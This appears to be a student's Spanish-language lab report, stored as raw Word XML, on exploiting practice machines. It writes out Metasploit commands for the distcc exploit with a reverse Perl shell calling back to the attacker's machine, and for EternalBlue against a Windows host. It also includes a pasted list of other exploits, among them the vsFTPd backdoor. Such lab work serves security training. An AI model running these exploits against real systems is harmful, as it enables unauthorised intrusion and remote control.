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EJERCICIOS - ELEVACIÓN DE PRIVILEGIOS Y TRANSFERENCIA DE FICHEROS</w:t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Prerrequisitos</w:t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Kali Linux</w:t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Metasploitable2:</w:t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Explotación de vulnerabilidad CVE-2004-2687 (distcc) para acceso con usuario limitado</w:t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Windowsploitable LPE</w:t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Sistema Linux</w:t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Enumeración básica y recopilación de información de la máquina utilizando modulos de metasploit y comandos.</w:t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Transferencia de fichero a la máquina vulnerable utilizando netcat.</w:t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Ejecución de cualquiera de los scripts vistos en clase para comprobar vulnerabilidades locales.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000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Indicar algún exploit disponible que explote alguna de las vulnerabilidades locales encontradas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000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keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="80" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_lobiq1lcmpw0" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Sistema Linux (Metasploitable2)</w:t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before="280" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_j7kk089gkyit" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Iniciamos msfconsole</w:t>
      </w:r>
    </w:p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148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search CVE-2004-2687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60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Carga el exploit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distcc_exec</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">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 exploit/unix/misc/distcc_exec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Configura las opciones del exploit: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 RHOST 192.168.1.72</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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 RPORT 3632</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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 LHOST 192.168.1.69</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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 LPORT 4444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Selecciona un payload válido, como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cmd/unix/reverse_perl</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">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 PAYLOAD cmd/unix/reverse_perl</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001F">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr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Ejecuta el exploit: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exploit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812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me he descargado una foto de un gato en kali y la he llamado gato.jpeg. Guardada en la carpeta Downloads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4819650" cy="62865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Ahora en consola metaexploit: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720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5306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 demasiado largo lo que me sale así que no voy a ponerlo todo aquí. Lo he copiado y se lo he puesto a chatgpt para que me resuma de manera más visual las vulnerabilidades disponibles.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Basado en los servicios y vulnerabilidades encontradas en el escaneo de Nmap, aquí tienes algunos exploits específicos que podrías considerar para explotar algunas de esas vulnerabilidades locales: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vsFTPd 2.3.4 Backdoor (CVE-2011-2523)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Exploit</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: vsFTPd 2.3.4 Backdoor - Metasploit Module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Descripción</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Este exploit aprovecha una puerta trasera específica en la versión 2.3.4 del servidor FTP vsFTPd. Permite ejecutar comandos arbitrarios con privilegios de root en el sistema objetivo.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Referencia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hyperlink r:id="rId1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Exploit en Metasploit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SSLv3 POODLE (CVE-2014-3566)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Exploit</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: SSL POODLE - CVE-2014-3566 SSL/TLS MITM Vulnerability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Descripción</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Este exploit permite a un atacante obtener datos en claro mediante un ataque de oracle de relleno contra conexiones SSL/TLS que utilizan el protocolo SSLv3.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Referencia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hyperlink r:id="rId1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Información sobre POODLE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CCS Injection (CVE-2014-0224)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Exploit</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: CCS Injection - OpenSSL CVE-2014-0224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Descripción</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Este exploit explota una vulnerabilidad en versiones específicas de OpenSSL antes de 0.9.8za, 1.0.0 antes de 1.0.0m y 1.0.1 antes de 1.0.1h. Permite a un atacante realizar un ataque de intermediario en comunicaciones SSL/TLS.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Referencia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hyperlink r:id="rId1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CVE-2014-0224 en Mitre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Sistema Windows</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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Enumeración básica y recopilación de información de la máquina utilizando modulos de metasploit y comandos.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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Transferencia de fichero a la máquina vulnerable utilizando netcat.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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Ejecución de cualquiera de los scripts vistos en clase para comprobar vulnerabilidades locales.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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Indicar algún exploit disponible que explote alguna de las vulnerabilidades locales encontradas.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abrimos msfconsole y ponemos search eternalblue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color w:val="188038"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msf6 &gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> use exploit/windows/smb/ms17_010_eternalblue</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004B">
      <w:pPr>
        <w:rPr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color w:val="188038"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msf6 exploit(windows/smb/ms17_010_eternalblue) &gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> show options</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004D">
      <w:pPr>
        <w:rPr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color w:val="188038"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="188038"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="26035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color w:val="188038"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msf6 exploit(windows/smb/ms17_010_eternalblue) &gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> set RHOSTS 192.168.1.80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color w:val="188038"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msf6 exploit(windows/smb/ms17_010_eternalblue) &gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000055">
      <w:pPr>
        <w:rPr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color w:val="188038"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="188038"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="29210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Shell y Systeminfo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color w:val="188038"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="188038"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="3594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hyperlink" Target="https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb" TargetMode="External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yperlink" Target="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.openssl.org/~bodo/ssl-poodle.pdf" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8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5.png"/><Relationship Id="rId18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